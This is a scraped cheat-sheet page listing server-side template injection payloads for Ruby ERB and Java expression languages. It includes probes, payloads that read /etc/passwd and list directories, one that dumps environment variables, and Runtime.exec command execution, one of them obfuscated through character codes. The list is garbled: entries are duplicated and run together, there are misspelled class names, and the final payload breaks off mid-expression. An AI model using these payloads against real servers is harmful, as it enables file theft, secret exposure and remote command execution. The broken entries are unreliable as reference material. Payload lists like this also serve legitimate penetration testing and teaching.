Server Side Template Injection List of different payloads Ruby Basic Injection < %= 7 * 7 % > Retrieve /etc/passwd <%= File.open(...
Server Side Template Injection
List of different payloads
Ruby
Basic Injection
<%= 7 * 7 %>
Retrieve /etc/passwd
<%= File.open('/etc/passwd').read %>List of files and directories
<%= Dir.entries('/') %>Java
Basic Injection
${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}7*7$}
${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}7*7$}
Retrieve the system's environment variables
${T(java.lang.System).getenv()}
${T(java.lang.System).getenv()}Retrieve /etc/passwd
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUTils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Charater).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(}
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUTils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Charater).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(}
COMMENTS